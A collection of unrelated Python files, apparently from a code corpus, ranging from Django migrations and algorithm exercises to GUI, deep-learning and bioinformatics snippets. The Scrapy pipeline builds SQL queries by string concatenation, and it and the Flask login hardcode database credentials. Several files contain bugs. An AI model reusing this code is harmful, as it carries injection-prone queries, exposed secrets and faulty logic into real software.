('agent_sent_them_on', models.BooleanField(default=False, verbose_name='An agent who sent them on')),
('relationship_married_two_months', models.BooleanField(default=False, verbose_name='During the past 2 months')),
('different_ethnicities', models.BooleanField(default=False, verbose_name='Appear to be of different ethnicities')),
('thailand_destination', models.CharField(blank=True, max_length=127)),
('malaysia_destination', models.CharField(blank=True, max_length=127)),
('where_going_other', models.CharField(blank=True, max_length=127)),
('work_sector_agriculture', models.BooleanField(default=False, verbose_name='Agriculture')),
('work_sector_construction', models.BooleanField(default=False, verbose_name='Construction')),
('work_sector_domestic_service', models.BooleanField(default=False, verbose_name='Domestic Services')),
('work_sector_dont_know', models.BooleanField(default=False, verbose_name="Don't know")),
('work_sector_factory', models.BooleanField(default=False, verbose_name='Factory')),
('work_sector_fishing', models.BooleanField(default=False, verbose_name='Fishing')),
('work_sector_hospitality', models.BooleanField(default=False, verbose_name='Hospitality')),
('work_sector_logging', models.BooleanField(default=False, verbose_name='Logging')),
('work_sector_other', models.CharField(blank=True, max_length=127)),
('no_company_phone', models.BooleanField(default=False, verbose_name='No company phone number')),
('job_confirmed', models.BooleanField(default=False, verbose_name='job confirmed')),
('valid_id_or_enrollment_documents', models.BooleanField(default=False, verbose_name='Valid ID card or enrollment documents')),
('enrollment_confirmed', models.BooleanField(default=False, verbose_name='Enrollment confirmed')),
('purpose_for_going_other', models.CharField(blank=True, max_length=127)),
('took_out_loan', models.CharField(blank=True, max_length=127)),
('recruited_broker', models.BooleanField(default=False, verbose_name='Broker/Agent')),
('how_recruited_broker_approached', models.BooleanField(default=False, verbose_name='Broker approached them')),
('met_broker_through_advertisement', models.BooleanField(default=False, verbose_name='Through advertisment')),
('met_broker_online', models.CharField(blank=True, max_length=127)),
('how_recruited_broker_other', models.CharField(blank=True, max_length=127)),
('broker_company', models.CharField(blank=True, max_length=127)),
('unwilling_to_give_info_about_broker', models.BooleanField(default=False, verbose_name='unwilling to give information about them')),
('initial_signs', models.TextField(blank=True, verbose_name='Initial Signs')),
('case_notes', models.TextField(blank=True, verbose_name='Case Notes')),
('broker', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='dataentry.Person')),
('form_entered_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='irfcambodia_entered_by', to=settings.AUTH_USER_MODEL)),
('station', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='dataentry.BorderStation')),
('where_going_doesnt_know', models.BooleanField(default=False, verbose_name="Don't know where going")),
('expected_earning', models.CharField(blank=True, max_length=127)),
],
options={
'abstract': False,
},
),
migrations.AddField(
model_name='irfattachmentcambodia',
name='interception_record',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='dataentry.IrfCambodia'),
),
migrations.AddField(
model_name='intercepteecambodia',
name='interception_record',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='interceptees', to='dataentry.IrfCambodia'),
),
migrations.AddField(
model_name='intercepteecambodia',
name='person',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='dataentry.Person'),
),
]
|
# Generated by Django 3.1.4 on 2021-01-05 06:58
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Funding',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('address', models.CharField(max_length=60)),
('transaction', models.CharField(max_length=70)),
('output_index', models.IntegerField()),
('low_liquidation_price', models.IntegerField()),
('high_liquidation_price', models.IntegerField()),
('earliest_liquidation_height', models.IntegerField()),
('maturity_height', models.IntegerField()),
('low_truncated_zeroes', models.CharField(max_length=10)),
('high_low_delta_truncated_zeroes', models.CharField(max_length=10)),
('hedge_units_x_sats_per_bch_high_trunc', models.IntegerField()),
('payout_sats_low_trunc', models.IntegerField()),
],
),
migrations.CreateModel(
name='Settlement',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('spending_transaction', models.CharField(max_length=70)),
('settlement_type', models.CharField(max_length=20)),
('hedge_satoshis', models.IntegerField()),
('long_satoshis', models.IntegerField()),
('oracle_price', models.IntegerField()),
('funding', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='main.funding')),
],
),
]
|
from tensorflow.python.tools.inspect_checkpoint import print_tensors_in_checkpoint_file
import os
model_dir = '/work/isanchez/g/ds4-gdl-lrdecay/subpixel'
checkpoint_path = os.path.join(model_dir, "model-329")
print_tensors_in_checkpoint_file(file_name=checkpoint_path, tensor_name='', all_tensors=False) |
MOD = 10 ** 9 + 7
n, k = map(int, input().split())
x = [0 for _ in range(k + 1)]
ans = 0
for i in range(k, 0, -1):
x[i] = pow(k // i, n, MOD)
t = 0
for j in range(2 * i, k + 1, i):
x[i] -= x[j]
x[i] %= MOD
ans += i * x[i] % MOD
ans %= MOD
print(ans)
|
#! /usr/bin/python3
print("content-type: text/html")
print()
import cgi
fs = cgi.FieldStorage()
p_no = fs.getvalue("commands")
if p_no=="SV16 FOX":
print('''<pre>Name : Rocky
License No :80819091
Vehicle Type :MCWG
Engine No : bhjik2314
Insurance validity : 7/07/2028</pre>''')
elif p_no=="MH 20EE 7598":
print('''<pre>Name : Ajay
License No :20897213
Vehicle Type :LMV
Engine No : khgt5677
Insurance validity : 2/12/2030</pre>''')
else:
print("No records available")
|
def merge_sort(A):
def merge(L, R):
A = [None] * (len(L) + len(R))
i = j = k = 0
while i < len(L) and j < len(R):
if L[i] <= R[j]:
A[k] = L[i]
i += 1
else:
A[k] = R[j]
j += 1
k += 1
A[k:] = L[i:] + R[j:]
return A
len_a = len(A)
if len_a <= 1:
return A
mid = len_a // 2
return merge(merge_sort(A[:mid]), merge_sort(A[mid:]))
n = int(input())
using_list = list(map(int, input().split()))
evens, odds = [], []
for elem in using_list:
if elem % 2 == 0:
evens.append(elem)
else:
odds.append(elem)
print(' '.join(map(str, merge_sort(odds) + merge_sort(evens)[-1::-1])))
|
# when importing this module/folder, actually import all classes in all modules in this folder
def is_uuid(text, cde_type = None):
def is_hex(text):
if not text:
return True
# calibre ids use only lower-case for uuids
return text[0] in '0123456789abcdef' and is_hex(text[1:])
if not text:
return False
if len(text) == 36:
# very unlikely not to be # is_hex(text.replace('-', ''))
return cde_type in ('EBOK', None) and text[8] == '-' and text[13] == '-' and text[18] == '-' and text[23] == '-'
if len(text) == 32:
return cde_type in ('PDOC', None) and is_hex(text)
# good enough
return False
TODO = 'todo-g7g'
TODO_PATH = '/FionaTodoListProxy/'
CDE = 'cde-g7g'
CDE_PATH = '/FionaCDEServiceEngine/'
FIRS = 'firs-g7g'
FIRS_PATH = '/FirsProxy/'
FIRS_TA = 'firs-ta-g7g'
#WWW = 'www'
#EMBER_PATH = '/gp/ember/xyml/'
#STORE_PATH = '/gp/g7g/xyml1/'
# _handlers = []
# def register(h):
# _handlers.append(h)
# def match(r):
# for h in _handlers:
# if h.accept(r):
# return r
# the order here is the order in which handlers are matched when processing a request
from .ksp import *
from .sync_metadata import *
#from .get_metadata import *
from .get_items import *
from .remove_items import *
from .download_content import *
from .upload_snapshot import *
from .sidecar import *
from .get_pagenumbers import *
from .get_annotations import *
from .collections import *
from .registration import *
#from .store import *
from .images import *
|
# This is a comment
import os.path
env = Environment(CPPPATH='vendor/cii20/src') # Create an environmnet
env.Append(CCFLAGS = ['-g','-O3' ,'-Wall'])
def filtered_glob(env, pattern, omit=[],
ondisk=True, source=False, strings=False):
return filter(
lambda f: os.path.basename(f.path) not in omit,
env.Glob(pattern))
env.AddMethod(filtered_glob, "FilteredGlob");
ciifiles = env.Object(env.FilteredGlob('vendor/cii20/src/*.c',
['SpeciallyTreatedFile.cc', 'thread-nt.c','thread.c']))
libcommon_target = "common"
libcommon_sources = [ Glob("src/common/*.c"), "libcii.a" ]
libcommon = env.StaticLibrary(target = libcommon_target, source = libcommon_sources)
libcii_target = "cii"
libcii_sources = [ Glob("vendor/cii20/src/*.c") ]
libcii = env.StaticLibrary(target = libcii_target, source = ciifiles)
singletontest = env.Program(source = [ Glob("src/Behavioral/Chain_Of_Responsibility/*.c") ,"libcii.a" ],
target = "src/Behavioral/Chain_Of_Responsibility/test")
singletontest = env.Program(source = [ Glob("src/Behavioral/Command/*.c"), "libcommon.a","libcii.a" ],
target = "src/Behavioral/Command/test")
singletontest = env.Program(source = [ Glob("src/Behavioral/Interpreter/*.c"), "libcommon.a","libcii.a" ],
target = "src/Behavioral/Interpreter/test")
singletontest = env.Program(source = [ Glob("src/Behavioral/Iterator/*.c"), "libcommon.a","libcii.a" ],
target = "src/Behavioral/Iterator/test")
singletontest = env.Program(source = [ Glob("src/Behavioral/Mediator/*.c") ,"libcii.a" ],
target = "src/Behavioral/Mediator/test")
singletontest = env.Program(source = [ Glob("src/Behavioral/Memento/*.c"), "libcommon.a","libcii.a" ],
target = "src/Behavioral/Memento/test")
singletontest = env.Program(source = [ Glob("src/Behavioral/Observer/*.c"), "libcii.a" ],
target = "src/Behavioral/Observer/test")
singletontest = env.Program(source = [ Glob("src/Behavioral/State/*.c"), "libcommon.a", "libcii.a" ],
target = "src/Behavioral/State/test")
singletontest = env.Program(source = [ Glob("src/Behavioral/Strategy/*.c"), "libcommon.a","libcii.a" ],
target = "src/Behavioral/Strategy/test")
singletontest = env.Program(source = [ Glob("src/Behavioral/Template_Method/*.c"), "libcommon.a","libcii.a" ],
target = "src/Behavioral/Template_Method/test")
singletontest = env.Program(source = [ Glob("src/Behavioral/Visitor/*.c"),"libcii.a" ],
target = "src/Behavioral/Visitor/test")
singletontest = env.Program(source = [ Glob("src/Creational/Abstract_Factory/*.c"), "libcommon.a" , "libcii.a" ],
target = "src/Creational/Abstract_Factory/test")
singletontest = env.Program(source = [ Glob("src/Creational/Builder/*.c"), "libcommon.a", "libcii.a" ],
target = "src/Creational/Builder/test")
singletontest = env.Program(source = [ Glob("src/Creational/Factory_Method/*.c"), "libcommon.a" , "libcii.a" ],
target = "src/Creational/Factory_Method/test")
singletontest = env.Program(source = [ Glob("src/Creational/Prototype/*.c") , "libcii.a" ],
target = "src/Creational/Prototype/test")
singletontest = env.Program(source = [ Glob("src/Creational/Singleton/*.c") , "libcii.a" ],
target = "src/Creational/Singleton/test")
singletontest = env.Program(source = [ Glob("src/Structural/Adapter/*.c") , "libcii.a" ],
target = "src/Structural/Adapter/test")
singletontest = env.Program(source = [ Glob("src/Structural/Bridge/*.c") , "libcii.a" ],
target = "src/Structural/Bridge/test")
singletontest = env.Program(source = [ Glob("src/Structural/Composite/*.c"), "libcii.a" ],
target = "src/Structural/Composite/test")
singletontest = env.Program(source = [ Glob("src/Structural/Decorator/*.c") , "libcommon.a" , "libcii.a" ],
target = "src/Structural/Decorator/test")
singletontest = env.Program(source = [ env.Glob("src/Structural/Facade/*.c"), "libcommon.a" , "libcii.a" ],
target = "src/Structural/Facade/test")
singletontest = env.Program(source = [ Glob("src/Structural/Flyweight/*.c") , "libcii.a" ],
target = "src/Structural/Flyweight/test")
singletontest = env.Program(source = [ Glob("src/Structural/Proxy/*.c") , "libcii.a" ],
target = "src/Structural/Proxy/test")
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import pymysql
class BokeepjtPipeline(object):
def __init__(self):
# 连接对应数据库
self.conn = pymysql.connect("127.0.0.1", "root", "seven456", "bokee")
def process_item(self, item, spider):
# 每一个博文列表页中包含多篇博文的信息, 我们可以通过 for 循环一次处理各博文的信息
for j in range(0, len(item["name"])):
name = item["name"][j]
url = item["url"][j]
hits = item["hits"][j]
comment = item["comment"]["j"]
# 构造对应的 sql 语句, 实现将获取到的对应数据插入数据库中
sql = "insert into mybokee(name,url,hits,comment) VALUES('" + name + "','" + url + "','" + hits + "','" + comment + "')"
# 通过 query 实现执行对应的 sql 语句
self.conn.query(sql)
return item
def close_spider(self, spider):
# 最后关闭数据库连接
self.conn.close()
|
inteiro1=int(input("Digite o primeiro número inteiro(Por exemplo 1,2,3..): "))
inteiro2=int(input("Digite o segundo número inteiro(Por exemplo 1,2,3..): "))
real=float(input("Digite um número real(Por exemplo 1.25, 1/2...): "))
a=inteiro1*2*(inteiro2/2)
print("O produto do dobro do primeiro com metade do segundo é: ", a)
b=(inteiro1*3)+real
print("A soma do triplo do primeiro com o terceiro é: ", b)
c=real**3
print("O terceiro elevado ao cubo é: ", c) |
from opster import command
@command()
def main(arg1, arg2, arg3=None, arg4='arg4',
opt1=('', 'opt1', 'help for --opt1'),
*args,
opt2=('', 'opt2', 'help for --opt2')):
print(arg1, arg2, arg3, arg4)
print(args)
print(opt1, opt2)
if __name__ == '__main__':
main.command()
|
from PySide2.QtWidgets import *
class Window(QWidget):
def __init__(self):
QWidget.__init__(self)
self.setWindowTitle("IHM")
self.setMinimumSize(500,300)
self.layout = QHBoxLayout()
self.Qbar = QProgressBar()
self.slider = QSlider()
self.Qbar.setValue(0)
self.slider.value()
self.slider.valueChanged.connect(self.Qbar.setValue)
self.layout.addWidget(self.Qbar)
self.layout.addWidget(self.slider)
self.setLayout(self.layout)
if __name__ == "__main__":
app = QApplication([])
win = Window()
win.show()
app.exec_()
|
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk
from gi.repository import Gdk
css = b"""
#hello_world_window {
background-color: red;
}
#hello_world_button {
background-color: blue;
}
"""
style_provider = Gtk.CssProvider()
style_provider.load_from_data(css)
class HelloWorldWindow(Gtk.Window):
def __init__(self):
Gtk.Window.__init__(self, title="Linux at PUCP")
self.set_name('hello_world_window')
self.set_border_width(10)
self.button = Gtk.Button(label="Go to linux playa!!")
self.button.set_name('hello_world_button')
self.button.connect("clicked", self.on_button_clicked)
self.add(self.button)
def on_button_clicked(self, widget):
print("Hello Linux at PUCP!! :D")
def main():
win = HelloWorldWindow()
Gtk.StyleContext.add_provider_for_screen(
Gdk.Screen.get_default(),
style_provider,
Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION
)
win.connect("delete-event", Gtk.main_quit)
win.show_all()
Gtk.main()
if __name__ == '__main__':
main()
|
# 항해99_알고리즘_2021-03-13, 백준번호: 9461_파도반 수열_/by 정석진
r = int(input())
arr = [1, 1, 1]
for i in range(r):
x = int(input())
for j in range(x):
print(j)
r = arr[j]+arr[j+1]
arr.append(r)
print(arr)
res = arr[x-1]
print(arr)
print(res)
arr = [1, 1, 1] # 다음 입력에 대한 수열을 구하기 위해 arr초기화
# arr에 초기값을 [1,1] 아닌 [1,1,1] 을 준 이유는
# j=0일때 r = arr[j]+arr[j+1] 해서 구한값 => r = arr[0]+arr[1] => r= 1+1 =2
# arr.append(r) 을 만나 arr에 맨뒤에 붙여주는데 이때 arr에 초기값이 [1,1] 이거 였다면
# arr =[1,1,2] 가 되서 다음 반복인 j=1 이 들어오면 1+2=3이 되어버리기 때문에
# [1,1,1] 을 줌으로써 arr인덱스 위치에 j가 한칸 늦게 증가토록 만들어줬다
# 입력이 6일경우 j = 0,1,2,3,4,5
# j= 0
# [1, 1, 1, 2]
# j= 1
# [1, 1, 1, 2, 2]
# j= 2
# [1, 1, 1, 2, 2, 3]
# j= 3
# [1, 1, 1, 2, 2, 3, 4]
# j= 4
# [1, 1, 1, 2, 2, 3, 4, 5]
# j= 5
# [1, 1, 1, 2, 2, 3, 4, 5, 7] => j는 한칸늦게 arr에 append를 하기때문에
#
# j=5일때 arr[5] + arr[5+1] => 3+4 =7을 붙여준것
|
import os
from collections import defaultdict
import csv
import json
def load_json(path):
with open(path, 'r') as f:
return json.load(f)
def write_json_file(filename, data):
_, ext = os.path.splitext(filename)
filename = filename if ext == ".json" else f'{filename}.json'
with open(filename, 'w') as out_file:
json.dump(data, out_file, ensure_ascii=False, indent=2)
class KagglePreparer:
def save(self, file_name, bags):
bags_with_ids = self._add_ids_to_gifts(bags)
with open(file_name, "w", newline="") as f:
f.write('Gifts\n')
writer = csv.writer(f, delimiter='\t')
writer.writerows(bags_with_ids)
def _add_ids_to_gifts(self, bags):
id_controller = IdController()
bags_with_ids = []
for bag in bags:
bag_with_ids = []
for gift in bag:
gift_with_id = id_controller.convert_gift_to_kaggle_format(gift)
bag_with_ids.append(gift_with_id)
bags_with_ids.append(bag_with_ids)
return bags_with_ids
class IdController:
def __init__(self):
self.ids = defaultdict(int)
def convert_gift_to_kaggle_format(self, gift: str):
gift_with_index = f'{gift}_{self.ids[gift]}'
self.ids[gift] += 1
return gift_with_index
|
import requests
import json
@app.route("/login", methods=['GET', 'POST'])
def login():
if request.method == "GET":
return "wrong request"
if request.method == "POST":
data = request.get_json(force = True)
email = data['email']
password = data['password']
print("inside post req ")
db = MySQLdb.connect("localhost","root","password", "python_api")
cursor = db.cursor()
sql = "SELECT * FROM `users` WHERE email=%s and password=%s and external_type='email'"
# print(sql)
# respi = ""
resp = {'result': False, 'user': None}
try:
cursor.execute(sql, (email, password))
results = cursor.fetchall()
for row in results:
print(row[1])
userr = row[1]
token = row[4]
break
if len(results) == 1:
resp['result'] = True
resp['comments'] = "one user found"
resp['user'] = userr
resp['token'] = token
elif len(results) == 0:
resp['comments'] = "No users"
else:
resp['comments'] = "multiple users!!"
except:
# respi = "exception"
print("Error: unable to fecth data")
db.close()
return json.dumps(resp) |
dict = dict()
lista = list()
dict['nome'] = str(input('Nome do jogador: ')).capitalize()
partidas = int(input(f'Quantas partidas {dict["nome"]} jogou? '))
for c in range(0, partidas):
lista.append(int(input(f' Quantos gols na {c}° partida? ')))
dict['gols'] = lista[:]
dict['total'] = sum(lista)
print('-='*30)
print(dict)
print('-='*30)
for k, v in dict.items():
print(f'O campo {k} tem valor {v}')
print('-='*30)
print(f'O jogador {dict["nome"]} jogou {partidas} partidas.')
for i, v in enumerate(lista):
print(f' => Na partida {i}, fez {v} gols.')
print(dict['total'])
|
#----------- Importacion de modulos --------------#
from datetime import datetime
from data_sql import data, horario
import time
#-------------------------------------------------#
now = datetime.now()
hora = now.hour
Fecha = '{:%d de %b / %H:%M:%S}'.format(now)
dia = '{:%a}'.format(now) # dia
#-------------------------------------------------#
#------------- Led on/off msg --------------------#
def Led_asig(Aula, dia, block): # db of Aula('AA'...), dia(Lunes...), block('A','B'...),
data.cursor.execute(data.select_hora(Aula, block))
clase = horario()[dia]
if clase != None and clase != 'Feriado':
state = 'on'
else:
state = 'off'
print(state)
return state
#------------ Block msg --------------------------#
bloc = 0
def bloque():
dia = '{:%a}'.format(now) # dia
global bloc
if hora in range(7, 9):
bloc = 'A'
elif hora in range (9, 11):
bloc = 'B'
elif hora in range(11, 13):
bloc = 'C'
elif hora in range(14, 16):
bloc = 'D'
elif hora in range(16, 18):
bloc = 'E'
#-------------------------#
if dia == 'Mon': dayx = 1
elif dia == 'Tue': dayx = 2
elif dia == 'Wed': dayx = 3
elif dia == 'Thu': dayx = 4
elif dia == 'Fri': dayx = 5
#-------------------------#
return bloc, dayx
#-------------------------------------------------#
# print(Fecha)
# print(dia)
|
# 3D-UNet model.
# x: 128x128 resolution for 32 frames.
import torch
import torch.nn as nn
def conv_block_3d(in_dim, out_dim, activation):
return nn.Sequential(
nn.Conv3d(in_dim, out_dim, kernel_size=3, stride=1, padding=1),
nn.BatchNorm3d(out_dim),
activation,)
def conv_trans_block_3d(in_dim, out_dim, activation):
return nn.Sequential(
nn.ConvTranspose3d(in_dim, out_dim, kernel_size=3, stride=2, padding=1, output_padding=1),
nn.BatchNorm3d(out_dim),
activation,)
def conv_trans_block_2_3d(in_dim, out_dim, activation):
return nn.Sequential(
nn.ConvTranspose3d(in_dim, out_dim, kernel_size=3, stride=3, padding=1, output_padding=2),
nn.BatchNorm3d(out_dim),
activation,)
def max_pooling_3d():
return nn.MaxPool3d(kernel_size=2, stride=2, padding=0)
def max_pooling_2_3d():
return nn.MaxPool3d(kernel_size=2, stride=3, padding=0)
def conv_block_2_3d(in_dim, out_dim, activation):
return nn.Sequential(
conv_block_3d(in_dim, out_dim, activation),
nn.Conv3d(out_dim, out_dim, kernel_size=3, stride=1, padding=1),
nn.BatchNorm3d(out_dim),)
class UNet(nn.Module):
def __init__(self, in_dim, out_dim, num_filters):
super(UNet, self).__init__()
self.in_dim = in_dim
self.out_dim = out_dim
self.num_filters = num_filters
activation = nn.LeakyReLU(0.2, inplace=True)
# Down sampling
self.down_1 = conv_block_2_3d(self.in_dim, self.num_filters, activation)
self.pool_1 = max_pooling_3d()
self.down_2 = conv_block_2_3d(self.num_filters, self.num_filters * 2, activation)
self.pool_2 = max_pooling_3d()
self.down_3 = conv_block_2_3d(self.num_filters * 2, self.num_filters * 4, activation)
self.pool_3 = max_pooling_3d()
self.down_4 = conv_block_2_3d(self.num_filters * 4, self.num_filters * 8, activation)
self.pool_4 = max_pooling_2_3d()
self.down_5 = conv_block_2_3d(self.num_filters * 8, self.num_filters * 16, activation)
# self.pool_5 = max_pooling_3d()
# Bridge
self.bridge = conv_block_2_3d(self.num_filters * 16, self.num_filters * 32, activation)
# Up sampling
# self.trans_1 = conv_trans_block_3d(self.num_filters * 32, self.num_filters * 32, activation)
self.up_1 = conv_block_2_3d(self.num_filters * 48, self.num_filters * 16, activation)
self.trans_2 = conv_trans_block_2_3d(self.num_filters * 16, self.num_filters * 16, activation)
self.up_2 = conv_block_2_3d(self.num_filters * 24, self.num_filters * 8, activation)
self.trans_3 = conv_trans_block_3d(self.num_filters * 8, self.num_filters * 8, activation)
self.up_3 = conv_block_2_3d(self.num_filters * 12, self.num_filters * 4, activation)
self.trans_4 = conv_trans_block_3d(self.num_filters * 4, self.num_filters * 4, activation)
self.up_4 = conv_block_2_3d(self.num_filters * 6, self.num_filters * 2, activation)
self.trans_5 = conv_trans_block_3d(self.num_filters * 2, self.num_filters * 2, activation)
self.up_5 = conv_block_2_3d(self.num_filters * 3, self.num_filters * 1, activation)
# Output
self.out = conv_block_3d(self.num_filters, out_dim, activation)
def forward(self, x):
# Down sampling
down_1 = self.down_1(x) # -> [1, 4, 120, 120, 120]
pool_1 = self.pool_1(down_1) # -> [1, 4, 60, 60, 60]
down_2 = self.down_2(pool_1) # -> [1, 8, 60, 60, 60]
pool_2 = self.pool_2(down_2) # -> [1, 8, 30, 30, 30]
down_3 = self.down_3(pool_2) # -> [1, 16, 30, 30, 30]
pool_3 = self.pool_3(down_3) # -> [1, 16, 15, 15, 15]
down_4 = self.down_4(pool_3) # -> [1, 32, 15, 15, 15]
pool_4 = self.pool_4(down_4) # -> [1, 32, 5, 5, 5]
down_5 = self.down_5(pool_4) # -> [1, 64, 5, 5, 5]
# Bridge
bridge = self.bridge(down_5) # -> [1, 128, 5, 5, 5]
# Up sampling
concat_1 = torch.cat([bridge, down_5], dim=1) # -> [1, 192, 5, 5, 5]
up_1 = self.up_1(concat_1) # -> [1, 64, 5, 5, 5]
trans_2 = self.trans_2(up_1) # -> [1, 64, 15, 15, 15]
concat_2 = torch.cat([trans_2, down_4], dim=1) # -> [1, 96, 15, 15, 15]
up_2 = self.up_2(concat_2) # -> [1, 32, 15, 15, 15]
trans_3 = self.trans_3(up_2) # -> [1, 32, 30, 30, 30]
concat_3 = torch.cat([trans_3, down_3], dim=1) # -> [1, 48, 30, 30, 30]
up_3 = self.up_3(concat_3) # -> [1, 16, 30, 30, 30]
trans_4 = self.trans_4(up_3) # -> [1, 16, 60, 60, 60]
concat_4 = torch.cat([trans_4, down_2], dim=1) # -> [1, 24, 60, 60, 60]
up_4 = self.up_4(concat_4) # -> [1, 8, 60, 60, 60]
trans_5 = self.trans_5(up_4) # -> [1, 8, 120, 120, 120]
concat_5 = torch.cat([trans_5, down_1], dim=1) # -> [1, 12, 120, 120, 120]
up_5 = self.up_5(concat_5) # -> [1, 4, 120, 120, 120]
# Output
out = self.out(up_5) # -> [1, 3, 120, 120, 120]
return out
|
import cv2
import sys
import numpy as np
import os
IMG_SIZE = (96, 96)
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
video_capture = cv2.VideoCapture(0)
i = 0
while i < 120:
ret, frame = video_capture.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
for (x, y, w, h) in faces:
img = cv2.resize(frame[y:y+h, x:x+w], IMG_SIZE)
if i % 8 == 0:
cv2.imwrite(os.path.join('./tmp', str(i) + '.jpg'), img)
i += 1
video_capture.release()
cv2.destroyAllWindows()
|
# 모든 곱의 합을 다 구하는 것이 옳을까? No --> A의 가장 작은 값과 B의 가장 큰 값을 순서대로 곱해서 더하는 것이 최솟값을 구하는 것
# 최솟값을 구하는 방법만 알면 순탄하게 풀 수 있는 문제
# 시간 복잡도 : O(NlogN)
def solution(A,B):
m_sum = 0
A.sort() # 오름차순 정렬
B.sort(reverse=True) # 내림차순 정렬
for i in range(len(A)):
m_sum += A[i]*B[i]
return m_sum
A, B =[1, 4, 2],[5, 4, 4]
print(solution(A,B))
# bfs : visited를 활용하기(2차원)
# 벽돌 뿌수기 1회 기능 제공 |
import numpy as np
class DistPearson:
distance = 0
rcoeff = 0
def __init__(self, ori="", other="", seqtype="prot"):
self.ori = np.asarray( list( ori ) )
self.other = np.asarray( list( other ) )
self.seqtype = seqtype
self.orddiv = np.asarray( list( "-ACDEFGHIKLMNPQRSTVWYX") )
self.numdiv = len( self.orddiv )
self.X = 0
self.Y = 0
self.X2 = 0
self.Y2 = 0
self.XY = 0
self.ori_acu = np.zeros( (self.numdiv,), dtype=int )
self.other_acu = np.zeros( (self.numdiv,), dtype=int )
def calculate( self ):
ori = self.ori
other = self.other
LQ = len( ori )
it = np.nditer(ori, flags=['f_index'])
while not it.finished:
loc = np.where(self.orddiv == it[0])
if len( loc ) > 0 :
self.ori_acu[ loc[0] ] = self.ori_acu[ loc[0] ] + 1
it.iternext()
it = np.nditer(other, flags=['f_index'])
while not it.finished:
loc = np.where(self.orddiv == it[0])
if len( loc ) > 0 :
self.other_acu[ loc[0] ] = self.other_acu[ loc[0] ] + 1
it.iternext()
if [ LQ > 11 ] :
for x in range(1, self.numdiv):
self.distance = self.distance + pow( self.other_acu[x]-self.ori_acu[x], 2 )
self.X = self.X + self.other_acu[x];
self.Y = self.Y + self.ori_acu[x];
self.X2 = self.X2 + pow(self.other_acu[x], 2);
self.Y2 = self.Y2 + pow(self.ori_acu[x], 2);
self.XY = self.XY + ( self.other_acu[x] * self.ori_acu[x] )
self.rcoeff = ((20*self.X2)-pow(self.X,2))*((20*self.Y2)-pow(self.Y,2))
if self.rcoeff > 0 :
self.rcoeff = ((20*self.XY)-(self.X*self.Y))/pow(self.rcoeff,0.5)
self.distance=pow(self.distance,0.5);
class KDF:
KD = -1
Flx = -1
def __init__(self, ori="", other="", seqtype="prot"):
self.ori = np.asarray( list( ori ) )
self.other = np.asarray( list( other ) )
self.seqtype = seqtype
self.AAKD = np.asarray( list( "ARNDCQEGHILKMFPSTWYV" ) );
self.Rigid = np.asarray( list( "ALHVYIFCWM" ) );
self.KDp = np.array( [ 0,1.8,-4.5,-3.5,-3.5,2.5,-3.5,-3.5,-0.4,-3.2,4.5,3.8,-3.9,1.9,2.8,-1.6,-0.8,-0.7,-0.9,-1.3,4.2 ] );
self.AAFlex = np.asarray( list( "ARNDCQEGHILKMFPSTWYV" ) );
self.Flx1R = np.array( [ 0,0.946,1.028,1.006,1.089,0.878,1.028,1.036,1.042,0.952,0.892,0.961,1.082,0.862,0.912,1.085,1.048,1.051,0.917,0.93,0.927 ] );
self.Flx0R = np.array( [ 0,1.041,1.038,1.117,1.033,0.96,1.165,1.094,1.142,0.982,1.002,0.967,1.093,0.947,0.93,1.055,1.169,1.073,0.925,0.961,0.982 ] );
self.Flx2R = np.array( [ 0,0.892,0.901,0.93,0.932,0.925,0.885,0.933,0.923,0.894,0.872,0.921,1.057,0.804,0.914,0.932,0.923,0.934,0.803,0.837,0.913 ] );
def calculate( self ):
ori = self.ori
other = self.other
LQ = len( ori )
Rig = 0
Dif = 0
# print( self.ori )
# print( LQ )
if LQ > 0 :
FlQ = np.zeros( LQ + 1 )
FlS = np.zeros( LQ + 1 )
if len( np.where(self.Rigid == ori[0]) ) > 0 :
AAFlexLoc = np.where(self.AAFlex == ori[1])[0]
FlQ[0] = self.Flx1R[AAFlexLoc]
else :
AAFlexLoc = np.where(self.AAFlex == ori[1])[0]
FlQ[0] = self.Flx0R[AAFlexLoc]
if len( np.where(self.Rigid == other[0]) ) > 0 :
AAFlexLoc = np.where(self.AAFlex == other[1])[0]
FlS[0] = self.Flx1R[AAFlexLoc]
else :
AAFlexLoc = np.where(self.AAFlex == other[1])[0]
FlS[0] = self.Flx0R[AAFlexLoc]
if len( np.where(self.Rigid == ori[ LQ - 2 ]) ) > 0 :
AAFlexLoc = np.where(self.AAFlex == ori[ LQ - 1 ])[0]
FlQ[ LQ - 1 ] = self.Flx1R[AAFlexLoc]
else :
AAFlexLoc = np.where(self.AAFlex == ori[ LQ - 1 ])[0]
FlQ[ LQ - 1 ] = self.Flx0R[AAFlexLoc]
if len( np.where(self.Rigid == other[ LQ - 2 ]) ) > 0 :
AAFlexLoc = np.where(self.AAFlex == other[ LQ - 1 ])[0]
FlS[ LQ - 1 ] = self.Flx1R[AAFlexLoc]
else :
AAFlexLoc = np.where(self.AAFlex == other[ LQ - 1 ])[0]
FlS[ LQ - 1 ] = self.Flx0R[AAFlexLoc]
# print( str( FlQ[ LQ - 1 ] ) + "\t" + str( FlS[ LQ - 1 ] ) + "\n" )
for i in range(1, LQ-2):
# print( ori[i] )
# print( ori[i+2] )
if len( np.where(self.Rigid == ori[ i ])[0] ) > 0 :
Rig = 1
else :
Rig = 0
# print( Rig )
# print( ori[ i+2 ] )
